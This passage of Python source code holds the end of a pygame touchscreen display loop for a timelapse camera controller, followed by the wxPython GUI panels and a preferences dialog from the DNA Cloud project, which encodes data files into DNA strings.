elif event.type == MOUSEBUTTONUP:
motorRunning = 0
if screenMode >= 0 or screenMode != screenModePrior: break
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((480 - img.get_width() ) / 2,
(320 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
if screenMode == 2:
myfont = pygame.font.SysFont("Arial", 50)
label = myfont.render(numberstring, 1, (255,255,255))
screen.blit(label, (10, 2))
if screenMode == 1:
myfont = pygame.font.SysFont("Arial", 30)
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 70))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 70))
label = myfont.render(str(v['Images']) , 1, (255,255,255))
screen.blit(label, (130,130))
if screenMode == 0:
myfont = pygame.font.SysFont("Arial", 30)
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 50))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10, 90))
label = myfont.render("Remaining:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (280, 50))
label = myfont.render(str(currentframe) + " of " + str(v['Images']) , 1, (255,255,255))
screen.blit(label, (280, 90))
if rendering:
label = myfont.render("Please wait, Rendering video...", 1, (255, 255, 255))
screen.blit(label, (10, 280))
elif busy:
label = myfont.render("Recording...", 1, (255, 255, 255))
screen.blit(label, (10, 280))
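# Estimated time remaining: (interval + settling time) per remaining frame, converted to h/m/s via a throwaway datetime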
intervalLength = float((v['Interval'] + (settling_time*1000)))
remaining = float((intervalLength * (v['Images'] - currentframe)) / 1000)
sec = timedelta(seconds=int(remaining))
d = datetime(1,1,1) + sec
remainingStr = "%dh %dm %ds" % (d.hour, d.minute, d.second)
label = myfont.render(remainingStr , 1, (255,255,255))
screen.blit(label, (280, 130))
label = myfont.render(str(error) , 1, (255,255,255))
screen.blit(label, (10, 280))
pygame.display.update()
screenModePrior = screenMode
|
panels.py
|
# -*- coding: utf-8 -*-
"""
#########################################################################
Author: Shalin Shah
Project: DNA Cloud
Graduate Mentor: Dixita Limbachya
Mentor: Prof. Manish K Gupta
Date: 5 November 2013
Website: www.guptalab.org/dnacloud
This module contains both the panels for encoding and decoding.
#########################################################################
"""
import sys
from PIL import Image
if "win" in sys.platform:
from PIL import PngImagePlugin
import unicodedata
import barcodeGenerator
import math
import os
import sqlite3
import sqlite3 as lite
import wx
import extraModules
import multiprocessing
import time
from datetime import datetime
import shutil
import threading
CHUNK_SIZE = 1000000
if hasattr(sys, "frozen"):
PATH = os.path.dirname(sys.executable)
else:
PATH = os.path.dirname(os.path.abspath(__file__))
#print PATH , "panels"
FILE_EXT = '.dnac'
if "win" in sys.platform and not "darwin" in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 470
elif "linux" in sys.platform or 'darwin' in sys.platform:
BARCODE_HEIGHT = 96
BARCODE_WIDTH = 600
FOLDER_DISCLAIMER = "It is not mandatory to select a default folder. If you don't, you will be asked for a save location every time you save a .dnac file."
PREF_DISCLAIMER = "Disclaimer: Please note that these details will be used by bio companies to identify the owner of the DNA strings, hence they are mandatory."
HEADER_TEXT = "Please select the workspace you would like to work in. All your files (including temporary files) will be stored in this working directory; it can also be changed later from Preferences."
SOFTWARE_DETAILS = "\n\n Version 1.0\n\n Visit us at www.guptalab.org/dnacloud\n\n Contact us at dnacloud@guptalab.org"
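# The classes below build the main UI: encodePanel and decodePanel for the two workflows, plus
# dialogs for preferences, passwords, the start-up encode/decode choice, workspace selection and size/property estimation.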
class encodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox1 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-ENCODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.DEFAULT,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.ALIGN_CENTER | wx.TOP | wx.LEFT , border = 10)
#This is the adjustment of the Basic BUI text and textCtrl panels along with save to DataBase and Discard Button Options
head = wx.StaticText(self ,label = "Encode data file into DNA String",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose file",size = (150,30))
self.hBox1.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 10)
path = wx.StaticText(self, label = "Select any data file (audio, video, doc etc.) from your computer")
self.hBox1.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.vBox1.Add(self.hBox1)
head = wx.StaticText(self,label = "Details (approx.)")
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",size = (500,25),style= wx.TE_READONLY)
self.hBox.Add(path,2 ,flag = wx.EXPAND)
self.hBox.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Lenght Of DNA String : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox2.Add(content1, 2, flag = wx.EXPAND)
self.hBox2.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox2,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",size = (300,25),style= wx.TE_READONLY)
self.hBox3.Add(content1, 2, flag = wx.EXPAND)
self.hBox3.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox3,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox4 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of each DNA Chunk : ", style = wx.ALIGN_CENTRE)
self.txt4 = wx.TextCtrl(self,name = "hBox4",size = (300,25),style= wx.TE_READONLY)
self.hBox4.Add(content1, 2, flag = wx.EXPAND)
self.hBox4.Add(self.txt4, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox4,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox5 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " File Size (Bytes) : " , style = wx.ALIGN_CENTRE)
self.txt5 = wx.TextCtrl(self,name = "hBox5",size = (300,25),style= wx.TE_READONLY)
self.hBox5.Add(content1, 2, flag = wx.EXPAND)
self.hBox5.Add(self.txt5, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox1.Add(self.hBox5,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
# Note: there is no self.txt1 (the detail fields are self.txt and self.txt2..txt5); the block below is disabled and kept only for reference.
"""
head = wx.StaticText(self,label = "Encoded DNA String")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox9 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String : ", style = wx.ALIGN_CENTRE)
self.but9 = wx.Button(self,label = "View DNA String")
content1.SetFont(font)
self.hBox9.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox9.Add(self.but9 ,flag = wx.EXPAND | wx.LEFT , border = 180)
self.vBox1.Add(self.hBox9 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox10 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = "DNA String List with Error Checks : ", style = wx.ALIGN_CENTRE)
self.but10 = wx.Button(self,label = "View DNA Chunks")
font = wx.Font(9 , wx.DEFAULT, wx.NORMAL, wx.BOLD)
content1.SetFont(font)
self.hBox10.Add(content1 ,flag = wx.LEFT ,border = 20)
self.hBox10.Add(self.but10 ,flag = wx.EXPAND)
self.vBox1.Add(self.hBox10 ,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
"""
self.hBox11 = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label = "Encode your File",size = (160,30))
self.discardBut = wx.Button(self,label = "Reset file Selected",size = (160,30))
self.hBox11.Add(self.saveBut, flag = wx.EXPAND | wx.LEFT , border = 20)
self.hBox11.Add(self.discardBut, flag = wx.EXPAND | wx.LEFT ,border = 20)
self.vBox1.Add(self.hBox11 ,flag = wx.TOP | wx.BOTTOM ,border = 10)
"""
self.clearDB = wx.Button(self,label = "Clear Database")
self.hBox11.Add(self.clearDB ,flag = wx.EXPAND)
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox1.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox1.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM , border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox1.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox1.Add(line3, flag = wx.EXPAND)
self.hBox12 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox12.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM , border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD,underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.LEFT,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.LEFT | wx.EXPAND , border = 20)
self.hBox12.Add(self.v1Box)
self.vBox1.Add(self.hBox12,flag = wx.ALIGN_BOTTOM)
self.SetSizer(self.vBox1)
class decodePanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent = parent,style = wx.TAB_TRAVERSAL)
self.vBox2 = wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self ,label = "DNA-DECODER",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(pointSize = 19, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
else:
font = wx.Font(pointSize = 14, family = wx.FONTFAMILY_ROMAN,style = wx.NORMAL, weight = wx.FONTWEIGHT_BOLD, underline = True)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.ALIGN_CENTER | wx.LEFT | wx.TOP , border = 10)
head = wx.StaticText(self ,label = "Generate data file from already encoded DNA files",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line2 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
"""
self.cb = wx.ComboBox(self,size=(800,30) ,style=wx.CB_READONLY)
self.vBox2.Add(self.cb,flag = wx.TOP | wx.LEFT | wx.RIGHT , border = 10)
"""
self.hBox23 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " File Selected : ",style = wx.ALIGN_CENTRE)
self.txt = wx.TextCtrl(self,name = "hBox",style= wx.TE_READONLY)
self.hBox23.Add(path, 2, flag = wx.EXPAND)
self.hBox23.Add(self.txt, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox23,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBox24 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Length of DNA String (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt2 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox24.Add(content1, 2, flag = wx.EXPAND)
self.hBox24.Add(self.txt2, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox24,flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox25 = wx.BoxSizer(wx.HORIZONTAL)
content1 = wx.StaticText(self, label = " Number of DNA Chunks (approx.) : " , style = wx.ALIGN_CENTRE)
self.txt3 = wx.TextCtrl(self,name = "hBox3",style= wx.TE_READONLY)
self.hBox25.Add(content1, 2, flag = wx.EXPAND)
self.hBox25.Add(self.txt3, 8, flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox25,flag = wx.EXPAND | wx.TOP , border = 10)
self.hBox26 = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Select .dnac File ",size = (160,30))
self.hBox26.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT , border = 20)
self.decodeBut1 = wx.Button(self,label = "Decode selected File ",size = (160,30))
self.hBox26.Add(self.decodeBut1,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox26,flag = wx.TOP | wx.BOTTOM, border = 15)
head = wx.StaticText(self ,label = "Try DNA String just for fun",style = wx.CENTER)
if 'darwin' in sys.platform:
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line1 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox21 = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Please Write DNA String :", style = wx.ALIGN_CENTRE)
self.txt21 = wx.TextCtrl(self,name = "hBox")
self.hBox21.Add(path, 2,flag = wx.EXPAND)
self.hBox21.Add(self.txt21, 8,flag = wx.EXPAND | wx.RIGHT , border = 20)
self.vBox2.Add(self.hBox21 , flag = wx.EXPAND)
self.hBox22 = wx.BoxSizer(wx.HORIZONTAL)
self.decodeBut = wx.Button(self,label = "Decode",size = (150,30))
self.resetBut = wx.Button(self,label = "Reset",size = (150,30))
self.hBox22.Add(self.decodeBut ,flag = wx.LEFT ,border = 20)
self.hBox22.Add(self.resetBut ,flag = wx.EXPAND | wx.LEFT , border = 20)
self.vBox2.Add(self.hBox22 ,flag = wx.EXPAND | wx.TOP | wx.ALIGN_CENTER, border = 15)
"""
head = wx.StaticText(self,label = "© QR Code generated for given User Details")
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox2.Add(head,flag = wx.TOP | wx.LEFT,border =20)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
img = wx.EmptyImage(240,240)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox2.Add(self.imageCtrl,flag = wx.EXPAND | wx.LEFT | wx.BOTTOM ,border = 25)
"""
self.dummyhBox = wx.BoxSizer(wx.VERTICAL)
self.vBox2.Add(self.dummyhBox, 2, wx.EXPAND)
line3 = wx.StaticLine(self, size=(1000,1) , style = wx.ALIGN_CENTRE)
self.vBox2.Add(line3, flag = wx.EXPAND)
self.hBox27 = wx.BoxSizer(wx.HORIZONTAL)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.Image(name = PATH + '/../icons/DNAicon.png').ConvertToBitmap())
self.hBox27.Add(self.imageCtrl,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.TOP | wx.BOTTOM, border = 25)
self.v1Box= wx.BoxSizer(wx.VERTICAL)
head = wx.StaticText(self,label = "DNA-CLOUD")
font = wx.Font(11, wx.DEFAULT, wx.NORMAL, wx.BOLD, underline = True)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT | wx.TOP,border = 25)
head = wx.StaticText(self,label = SOFTWARE_DETAILS)
font = wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.v1Box.Add(head,flag = wx.ALIGN_CENTER_VERTICAL | wx.LEFT , border = 20)
self.hBox27.Add(self.v1Box)
self.vBox2.Add(self.hBox27)
self.SetSizer(self.vBox2)
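# Preferences dialog: collects the user's details, shows the generated barcode and saves everything to prefs.db;
# the layout differs slightly between the Windows and Linux/macOS branches.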
class Preferences(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
#print self.WORKSPACE_PATH
if "linux" in sys.platform:
self.WORKSPACE_PATH = unicodedata.normalize('NFKD', self.WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(self.WORKSPACE_PATH + '/barcode'):
os.mkdir(self.WORKSPACE_PATH + '/barcode')
if con:
con.close()
if "win" in sys.platform and not 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name : \t\t\t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path, 3, wx.EXPAND)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta, 8, flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Mobile Number : \t\t\t\t\t", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path, 3,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc, 8,flag = wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address : \t\t\t\t\t ", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path, 3,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd, 8,flag = wx.EXPAND | wx.RIGHT , border = 5)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg a.mkv.dnac): ", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 2,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
self.hBoxb.Add(self.txtb,proportion = 5 ,flag = wx.EXPAND |wx.RIGHT, border = 10)
self.vBox.Add(self.hBoxb , flag = wx.TOP | wx.BOTTOM , border = 7)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
try:
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
except IOError:
#"""Permission Error"""
#wx.MessageDialog(self,'Permission Denied. Please start the software in administrator mode.', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
#sys.exit(0)
shutil.copyfile(PATH + '/../icons/barcode.png',self.WORKSPACE_PATH + '/barcode/barcode.png')
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
if not os.path.isdir(self.WORKSPACE_PATH + '/.temp'):
os.mkdir(self.WORKSPACE_PATH +'/.temp')
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl = wx.StaticBitmap(self, wx.ID_ANY,wx.BitmapFromImage(img))
self.vBox.Add(self.imageCtrl,flag = wx.LEFT | wx.RIGHT |wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = PREF_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.barcodeBut = wx.Button(self,label=" Generate Barcode ")
self.cancelBut = wx.Button(self,label=" Close ")
self.hBoxe.Add(self.saveBut, flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.barcodeBut, flag = wx.RIGHT | wx.LEFT , border = 10)
self.hBoxe.Add(self.cancelBut, flag = wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.TOP | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL |wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
"""
head = wx.StaticText(self ,label = "Select Your Default Folder",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 10)
line4 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line4, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxf = wx.BoxSizer(wx.HORIZONTAL)
self.txtf = wx.TextCtrl(self,name = "hBox")
self.hBoxf.Add(self.txtf,proportion = 9 ,flag = wx.EXPAND |wx.RIGHT | wx.LEFT, border = 10)
self.browBut = wx.Button(self,label=" Browse ")
self.hBoxf.Add(self.browBut,proportion = 2,flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 7)
self.vBox.Add(self.hBoxf , flag = wx.TOP | wx.BOTTOM , border = 7)
head = wx.StaticText(self ,label = FOLDER_DISCLAIMER,style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
head.Wrap(450)
self.vBox.Add(head ,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10)
"""
head = wx.StaticText(self ,label = "Enter your details",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Full Name :", style = wx.ALIGN_CENTRE)
self.hBoxa.Add(path,proportion = 1,flag = wx.EXPAND|wx.LEFT ,border = 5)
self.txta = wx.TextCtrl(self,name = "hBox")
self.hBoxa.Add(self.txta,proportion = 4,flag = wx.EXPAND | wx.LEFT , border = 110)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Contact Number :", style = wx.ALIGN_CENTRE)
self.hBoxc.Add(path,proportion = 1,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtc = wx.TextCtrl(self,name = "hBox")
self.hBoxc.Add(self.txtc,proportion = 2 ,flag = wx.EXPAND | wx.LEFT , border = 60)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Email Address :", style = wx.ALIGN_CENTRE)
self.hBoxd.Add(path,proportion= 1,flag = wx.EXPAND|wx.LEFT , border = 7)
self.txtd = wx.TextCtrl(self,name = "hBox")
self.hBoxd.Add(self.txtd,proportion = 3,flag = wx.EXPAND | wx.LEFT , border = 75)
self.vBox.Add(self.hBoxd, flag = wx.TOP | wx.BOTTOM, border = 7)
self.hBoxb = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = "File Name (Eg. a.png.dnac):", style = wx.ALIGN_CENTRE)
self.hBoxb.Add(path,proportion = 2,flag = wx.EXPAND | wx.LEFT,border = 7)
self.txtb = wx.TextCtrl(self,name = "hBox")
